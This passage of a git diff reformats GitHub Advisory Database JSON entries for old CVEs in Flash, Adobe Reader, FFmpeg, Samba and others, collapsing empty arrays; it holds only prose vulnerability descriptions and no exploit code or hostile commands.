a/advisories/unreviewed/2022/05/GHSA-pj8h-q9j3-qpvv/GHSA-pj8h-q9j3-qpvv.json +++ b/advisories/unreviewed/2022/05/GHSA-pj8h-q9j3-qpvv/GHSA-pj8h-q9j3-qpvv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pjr9-cgqf-mfxq/GHSA-pjr9-cgqf-mfxq.json b/advisories/unreviewed/2022/05/GHSA-pjr9-cgqf-mfxq/GHSA-pjr9-cgqf-mfxq.json index b0663f5eea9..ba95364fcac 100644 --- a/advisories/unreviewed/2022/05/GHSA-pjr9-cgqf-mfxq/GHSA-pjr9-cgqf-mfxq.json +++ b/advisories/unreviewed/2022/05/GHSA-pjr9-cgqf-mfxq/GHSA-pjr9-cgqf-mfxq.json @@ -7,12 +7,8 @@ "CVE-2010-2166" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pjvm-3x7g-4998/GHSA-pjvm-3x7g-4998.json b/advisories/unreviewed/2022/05/GHSA-pjvm-3x7g-4998/GHSA-pjvm-3x7g-4998.json index 4e38038c5c8..84f57fee6c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-pjvm-3x7g-4998/GHSA-pjvm-3x7g-4998.json +++ b/advisories/unreviewed/2022/05/GHSA-pjvm-3x7g-4998/GHSA-pjvm-3x7g-4998.json @@ -7,12 +7,8 @@ "CVE-2013-7316" ], "details": "Cross-site scripting (XSS) vulnerability in GitLab 6.0 and other versions before 6.5.0 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML file, as demonstrated by README.html.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pm5j-x49r-ccq7/GHSA-pm5j-x49r-ccq7.json b/advisories/unreviewed/2022/05/GHSA-pm5j-x49r-ccq7/GHSA-pm5j-x49r-ccq7.json index 633cfe282e1..fca5c893377 100644 --- a/advisories/unreviewed/2022/05/GHSA-pm5j-x49r-ccq7/GHSA-pm5j-x49r-ccq7.json +++ b/advisories/unreviewed/2022/05/GHSA-pm5j-x49r-ccq7/GHSA-pm5j-x49r-ccq7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pmv9-g95v-j898/GHSA-pmv9-g95v-j898.json b/advisories/unreviewed/2022/05/GHSA-pmv9-g95v-j898/GHSA-pmv9-g95v-j898.json index 6f70709ad14..c0832379b91 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmv9-g95v-j898/GHSA-pmv9-g95v-j898.json +++ b/advisories/unreviewed/2022/05/GHSA-pmv9-g95v-j898/GHSA-pmv9-g95v-j898.json @@ -7,12 +7,8 @@ "CVE-2011-0562" ], "details": "Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0570 and CVE-2011-0588.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pq6f-jmr7-rfqq/GHSA-pq6f-jmr7-rfqq.json b/advisories/unreviewed/2022/05/GHSA-pq6f-jmr7-rfqq/GHSA-pq6f-jmr7-rfqq.json index 2ad6c8023bd..738cb51c6ea 100644 --- a/advisories/unreviewed/2022/05/GHSA-pq6f-jmr7-rfqq/GHSA-pq6f-jmr7-rfqq.json +++ b/advisories/unreviewed/2022/05/GHSA-pq6f-jmr7-rfqq/GHSA-pq6f-jmr7-rfqq.json @@ -7,12 +7,8 @@ "CVE-2010-2177" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pq9h-x7ww-cqrg/GHSA-pq9h-x7ww-cqrg.json b/advisories/unreviewed/2022/05/GHSA-pq9h-x7ww-cqrg/GHSA-pq9h-x7ww-cqrg.json index ec467a820e1..c0b0df25ece 100644 --- a/advisories/unreviewed/2022/05/GHSA-pq9h-x7ww-cqrg/GHSA-pq9h-x7ww-cqrg.json +++ b/advisories/unreviewed/2022/05/GHSA-pq9h-x7ww-cqrg/GHSA-pq9h-x7ww-cqrg.json @@ -7,12 +7,8 @@ "CVE-2010-4473" ], "details": "Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound and unspecified APIs, a different vulnerability than CVE-2010-4454 and CVE-2010-4462.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -76,9 +72,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pqgc-g6h5-p299/GHSA-pqgc-g6h5-p299.json b/advisories/unreviewed/2022/05/GHSA-pqgc-g6h5-p299/GHSA-pqgc-g6h5-p299.json index f5272c92a94..d9d0f05dc9c 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqgc-g6h5-p299/GHSA-pqgc-g6h5-p299.json +++ b/advisories/unreviewed/2022/05/GHSA-pqgc-g6h5-p299/GHSA-pqgc-g6h5-p299.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pqgf-2gjv-rp92/GHSA-pqgf-2gjv-rp92.json b/advisories/unreviewed/2022/05/GHSA-pqgf-2gjv-rp92/GHSA-pqgf-2gjv-rp92.json index 8814e67ee62..9f57ecd8911 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqgf-2gjv-rp92/GHSA-pqgf-2gjv-rp92.json +++ b/advisories/unreviewed/2022/05/GHSA-pqgf-2gjv-rp92/GHSA-pqgf-2gjv-rp92.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pqq3-38c3-35qx/GHSA-pqq3-38c3-35qx.json b/advisories/unreviewed/2022/05/GHSA-pqq3-38c3-35qx/GHSA-pqq3-38c3-35qx.json index a44ec846e03..20e031386b7 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqq3-38c3-35qx/GHSA-pqq3-38c3-35qx.json +++ b/advisories/unreviewed/2022/05/GHSA-pqq3-38c3-35qx/GHSA-pqq3-38c3-35qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pqx2-hr2v-cmw7/GHSA-pqx2-hr2v-cmw7.json b/advisories/unreviewed/2022/05/GHSA-pqx2-hr2v-cmw7/GHSA-pqx2-hr2v-cmw7.json index edb75f59c86..4da7040bbae 100644 --- a/advisories/unreviewed/2022/05/GHSA-pqx2-hr2v-cmw7/GHSA-pqx2-hr2v-cmw7.json +++ b/advisories/unreviewed/2022/05/GHSA-pqx2-hr2v-cmw7/GHSA-pqx2-hr2v-cmw7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pr6f-7vm7-f822/GHSA-pr6f-7vm7-f822.json b/advisories/unreviewed/2022/05/GHSA-pr6f-7vm7-f822/GHSA-pr6f-7vm7-f822.json index 5c40c0f404e..3c1b463d839 100644 --- a/advisories/unreviewed/2022/05/GHSA-pr6f-7vm7-f822/GHSA-pr6f-7vm7-f822.json +++ b/advisories/unreviewed/2022/05/GHSA-pr6f-7vm7-f822/GHSA-pr6f-7vm7-f822.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pr8p-69pg-7cjm/GHSA-pr8p-69pg-7cjm.json b/advisories/unreviewed/2022/05/GHSA-pr8p-69pg-7cjm/GHSA-pr8p-69pg-7cjm.json index bda51ee7138..38a7deded20 100644 --- a/advisories/unreviewed/2022/05/GHSA-pr8p-69pg-7cjm/GHSA-pr8p-69pg-7cjm.json +++ b/advisories/unreviewed/2022/05/GHSA-pr8p-69pg-7cjm/GHSA-pr8p-69pg-7cjm.json @@ -7,12 +7,8 @@ "CVE-2011-2416" ], "details": "Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2138.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-px2g-jrgw-pwrg/GHSA-px2g-jrgw-pwrg.json b/advisories/unreviewed/2022/05/GHSA-px2g-jrgw-pwrg/GHSA-px2g-jrgw-pwrg.json index 214f70d39f6..9f99d5ad0d4 100644 --- a/advisories/unreviewed/2022/05/GHSA-px2g-jrgw-pwrg/GHSA-px2g-jrgw-pwrg.json +++ b/advisories/unreviewed/2022/05/GHSA-px2g-jrgw-pwrg/GHSA-px2g-jrgw-pwrg.json @@ -7,12 +7,8 @@ "CVE-2011-0719" ], "details": "Samba 3.x before 3.3.15, 3.4.x before 3.4.12, and 3.5.x before 3.5.7 does not perform range checks for file descriptors before use of the FD_SET macro, which allows remote attackers to cause a denial of service (stack memory corruption, and infinite loop or daemon crash) by opening a large number of files, related to (1) Winbind or (2) smbd.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pxf5-9h36-3g24/GHSA-pxf5-9h36-3g24.json b/advisories/unreviewed/2022/05/GHSA-pxf5-9h36-3g24/GHSA-pxf5-9h36-3g24.json index e48f9fb471b..f321521f1cc 100644 --- a/advisories/unreviewed/2022/05/GHSA-pxf5-9h36-3g24/GHSA-pxf5-9h36-3g24.json +++ b/advisories/unreviewed/2022/05/GHSA-pxf5-9h36-3g24/GHSA-pxf5-9h36-3g24.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pxfq-w45x-3xjc/GHSA-pxfq-w45x-3xjc.json b/advisories/unreviewed/2022/05/GHSA-pxfq-w45x-3xjc/GHSA-pxfq-w45x-3xjc.json index 86831460d1c..894212cf63f 100644 --- a/advisories/unreviewed/2022/05/GHSA-pxfq-w45x-3xjc/GHSA-pxfq-w45x-3xjc.json +++ b/advisories/unreviewed/2022/05/GHSA-pxfq-w45x-3xjc/GHSA-pxfq-w45x-3xjc.json @@ -7,12 +7,8 @@ "CVE-2010-3268" ], "details": "The GetStringAMSHandler function in prgxhndl.dll in hndlrsvc.exe in the Intel Alert Handler service (aka Symantec Intel Handler service) in Intel Alert Management System (AMS), as used in Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4 and Symantec Endpoint Protection before 11.x, does not properly validate the CommandLine field of an AMS request, which allows remote attackers to cause a denial of service (application crash) via a crafted request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q246-grrp-j42h/GHSA-q246-grrp-j42h.json b/advisories/unreviewed/2022/05/GHSA-q246-grrp-j42h/GHSA-q246-grrp-j42h.json index 02911987f18..276ea7114a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-q246-grrp-j42h/GHSA-q246-grrp-j42h.json +++ b/advisories/unreviewed/2022/05/GHSA-q246-grrp-j42h/GHSA-q246-grrp-j42h.json @@ -7,12 +7,8 @@ "CVE-2010-2186" ], "details": "Unspecified vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q4vg-98mm-69wh/GHSA-q4vg-98mm-69wh.json b/advisories/unreviewed/2022/05/GHSA-q4vg-98mm-69wh/GHSA-q4vg-98mm-69wh.json index ea8eb14342c..d9c30f618da 100644 --- a/advisories/unreviewed/2022/05/GHSA-q4vg-98mm-69wh/GHSA-q4vg-98mm-69wh.json +++ b/advisories/unreviewed/2022/05/GHSA-q4vg-98mm-69wh/GHSA-q4vg-98mm-69wh.json @@ -7,12 +7,8 @@ "CVE-2011-0599" ], "details": "The Bitmap parsing component in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted image that causes an invalid pointer calculation related to 4/8-bit RLE compression, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0602.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q55h-fqrf-q889/GHSA-q55h-fqrf-q889.json b/advisories/unreviewed/2022/05/GHSA-q55h-fqrf-q889/GHSA-q55h-fqrf-q889.json index 0295ea2b85f..7bb32e181a1 100644 --- a/advisories/unreviewed/2022/05/GHSA-q55h-fqrf-q889/GHSA-q55h-fqrf-q889.json +++ b/advisories/unreviewed/2022/05/GHSA-q55h-fqrf-q889/GHSA-q55h-fqrf-q889.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q79f-c6p6-2j9r/GHSA-q79f-c6p6-2j9r.json b/advisories/unreviewed/2022/05/GHSA-q79f-c6p6-2j9r/GHSA-q79f-c6p6-2j9r.json index 010ab6d0120..abcd4678683 100644 --- a/advisories/unreviewed/2022/05/GHSA-q79f-c6p6-2j9r/GHSA-q79f-c6p6-2j9r.json +++ b/advisories/unreviewed/2022/05/GHSA-q79f-c6p6-2j9r/GHSA-q79f-c6p6-2j9r.json @@ -7,12 +7,8 @@ "CVE-2013-2277" ], "details": "The ff_h264_decode_seq_parameter_set function in h264_ps.c in libavcodec in FFmpeg before 1.1.3 does not validate the relationship between luma depth and chroma depth, which allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted H.264 data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q7vh-mgj9-p32p/GHSA-q7vh-mgj9-p32p.json b/advisories/unreviewed/2022/05/GHSA-q7vh-mgj9-p32p/GHSA-q7vh-mgj9-p32p.json index 1182bd4a01a..43402571559 100644 --- a/advisories/unreviewed/2022/05/GHSA-q7vh-mgj9-p32p/GHSA-q7vh-mgj9-p32p.json +++ b/advisories/unreviewed/2022/05/GHSA-q7vh-mgj9-p32p/GHSA-q7vh-mgj9-p32p.json @@ -7,12 +7,8 @@ "CVE-2011-0587" ], "details": "Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q89r-f728-w9pv/GHSA-q89r-f728-w9pv.json b/advisories/unreviewed/2022/05/GHSA-q89r-f728-w9pv/GHSA-q89r-f728-w9pv.json index 25ab82c9937..d739eaa6e41 100644 --- a/advisories/unreviewed/2022/05/GHSA-q89r-f728-w9pv/GHSA-q89r-f728-w9pv.json +++ b/advisories/unreviewed/2022/05/GHSA-q89r-f728-w9pv/GHSA-q89r-f728-w9pv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q8mw-vrp6-fqq8/GHSA-q8mw-vrp6-fqq8.json b/advisories/unreviewed/2022/05/GHSA-q8mw-vrp6-fqq8/GHSA-q8mw-vrp6-fqq8.json index ffdfd5f6bc1..6cc3416a554 100644 --- a/advisories/unreviewed/2022/05/GHSA-q8mw-vrp6-fqq8/GHSA-q8mw-vrp6-fqq8.json +++ b/advisories/unreviewed/2022/05/GHSA-q8mw-vrp6-fqq8/GHSA-q8mw-vrp6-fqq8.json @@ -7,12 +7,8 @@ "CVE-2011-3952" ], "details": "The decode_init function in kmvc.c in libavcodec in FFmpeg before 0.10 and in Libav 0.5.x before 0.5.9, 0.6.x before 0.6.6, 0.7.x before 0.7.6, and 0.8.x before 0.8.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a large palette size in a KMVC encoded file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q8vr-3rj5-9h8v/GHSA-q8vr-3rj5-9h8v.json b/advisories/unreviewed/2022/05/GHSA-q8vr-3rj5-9h8v/GHSA-q8vr-3rj5-9h8v.json index c740dfab351..8148a2a2a03 100644 --- a/advisories/unreviewed/2022/05/GHSA-q8vr-3rj5-9h8v/GHSA-q8vr-3rj5-9h8v.json +++ b/advisories/unreviewed/2022/05/GHSA-q8vr-3rj5-9h8v/GHSA-q8vr-3rj5-9h8v.json @@ -7,12 +7,8 @@ "CVE-2011-0598" ], "details": "Integer overflow in ACE.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code via crafted ICC data, a different vulnerability than CVE-2011-0596, CVE-2011-0599, and CVE-2011-0602.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q9xh-p5qr-2x33/GHSA-q9xh-p5qr-2x33.json b/advisories/unreviewed/2022/05/GHSA-q9xh-p5qr-2x33/GHSA-q9xh-p5qr-2x33.json index 4423052f898..9cb8680e42d 100644 --- a/advisories/unreviewed/2022/05/GHSA-q9xh-p5qr-2x33/GHSA-q9xh-p5qr-2x33.json +++ b/advisories/unreviewed/2022/05/GHSA-q9xh-p5qr-2x33/GHSA-q9xh-p5qr-2x33.json @@ -7,12 +7,8 @@ "CVE-2010-1799" ], "details": "Stack-based buffer overflow in the error-logging functionality in Apple QuickTime before 7.6.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qcpw-4x74-jfpp/GHSA-qcpw-4x74-jfpp.json b/advisories/unreviewed/2022/05/GHSA-qcpw-4x74-jfpp/GHSA-qcpw-4x74-jfpp.json index ec6ef52b31b..81c6a040d13 100644 --- a/advisories/unreviewed/2022/05/GHSA-qcpw-4x74-jfpp/GHSA-qcpw-4x74-jfpp.json +++ b/advisories/unreviewed/2022/05/GHSA-qcpw-4x74-jfpp/GHSA-qcpw-4x74-jfpp.json @@ -7,12 +7,8 @@ "CVE-2012-2798" ], "details": "Unspecified vulnerability in the decode_dds1 function in libavcodec/dfa.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an \"out of array write.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qcrg-7gwp-23jq/GHSA-qcrg-7gwp-23jq.json b/advisories/unreviewed/2022/05/GHSA-qcrg-7gwp-23jq/GHSA-qcrg-7gwp-23jq.json index 65053f9d137..a0fc0b3f082 100644 --- a/advisories/unreviewed/2022/05/GHSA-qcrg-7gwp-23jq/GHSA-qcrg-7gwp-23jq.json +++ b/advisories/unreviewed/2022/05/GHSA-qcrg-7gwp-23jq/GHSA-qcrg-7gwp-23jq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qfcj-3x5p-cpf6/GHSA-qfcj-3x5p-cpf6.json b/advisories/unreviewed/2022/05/GHSA-qfcj-3x5p-cpf6/GHSA-qfcj-3x5p-cpf6.json index 8a606ee2a29..17a038fa105 100644 --- a/advisories/unreviewed/2022/05/GHSA-qfcj-3x5p-cpf6/GHSA-qfcj-3x5p-cpf6.json +++ b/advisories/unreviewed/2022/05/GHSA-qfcj-3x5p-cpf6/GHSA-qfcj-3x5p-cpf6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qfh7-4jq5-cjrg/GHSA-qfh7-4jq5-cjrg.json b/advisories/unreviewed/2022/05/GHSA-qfh7-4jq5-cjrg/GHSA-qfh7-4jq5-cjrg.json index c7a47e6ece6..912533ac120 100644 --- a/advisories/unreviewed/2022/05/GHSA-qfh7-4jq5-cjrg/GHSA-qfh7-4jq5-cjrg.json +++ b/advisories/unreviewed/2022/05/GHSA-qfh7-4jq5-cjrg/GHSA-qfh7-4jq5-cjrg.json @@ -7,12 +7,8 @@ "CVE-2010-2175" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qg2j-2f4r-59vw/GHSA-qg2j-2f4r-59vw.json b/advisories/unreviewed/2022/05/GHSA-qg2j-2f4r-59vw/GHSA-qg2j-2f4r-59vw.json index 3acff548c69..4d9a6d24b7d 100644 --- a/advisories/unreviewed/2022/05/GHSA-qg2j-2f4r-59vw/GHSA-qg2j-2f4r-59vw.json +++ b/advisories/unreviewed/2022/05/GHSA-qg2j-2f4r-59vw/GHSA-qg2j-2f4r-59vw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qg98-326c-86rg/GHSA-qg98-326c-86rg.json b/advisories/unreviewed/2022/05/GHSA-qg98-326c-86rg/GHSA-qg98-326c-86rg.json index 326ce81f88f..e4f9ab5a9d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-qg98-326c-86rg/GHSA-qg98-326c-86rg.json +++ b/advisories/unreviewed/2022/05/GHSA-qg98-326c-86rg/GHSA-qg98-326c-86rg.json @@ -7,12 +7,8 @@ "CVE-2010-2173" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors, related to an \"invalid pointer vulnerability\" and the newclass (0x58) operator, a different vulnerability than CVE-2010-2174.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qgm9-mjrq-6f7w/GHSA-qgm9-mjrq-6f7w.json b/advisories/unreviewed/2022/05/GHSA-qgm9-mjrq-6f7w/GHSA-qgm9-mjrq-6f7w.json index a36988b89f0..2e9deeeedf4 100644 --- a/advisories/unreviewed/2022/05/GHSA-qgm9-mjrq-6f7w/GHSA-qgm9-mjrq-6f7w.json +++ b/advisories/unreviewed/2022/05/GHSA-qgm9-mjrq-6f7w/GHSA-qgm9-mjrq-6f7w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qh2q-wp9p-xxj9/GHSA-qh2q-wp9p-xxj9.json b/advisories/unreviewed/2022/05/GHSA-qh2q-wp9p-xxj9/GHSA-qh2q-wp9p-xxj9.json index e1947f51922..ef7de02d642 100644 --- a/advisories/unreviewed/2022/05/GHSA-qh2q-wp9p-xxj9/GHSA-qh2q-wp9p-xxj9.json +++ b/advisories/unreviewed/2022/05/GHSA-qh2q-wp9p-xxj9/GHSA-qh2q-wp9p-xxj9.json @@ -7,12 +7,8 @@ "CVE-2012-4171" ], "details": "Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on Windows and Mac OS X, before 10.3.183.23 and 11.x before 11.2.202.238 on Linux, before 11.1.111.16 on Android 2.x and 3.x, and before 11.1.115.17 on Android 4.x; Adobe AIR before 3.4.0.2540; and Adobe AIR SDK before 3.4.0.2540 allow attackers to cause a denial of service (application crash) by leveraging a logic error during handling of Firefox dialogs.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qj4w-733c-vfv3/GHSA-qj4w-733c-vfv3.json b/advisories/unreviewed/2022/05/GHSA-qj4w-733c-vfv3/GHSA-qj4w-733c-vfv3.json index d73f222b894..00194aee728 100644 --- 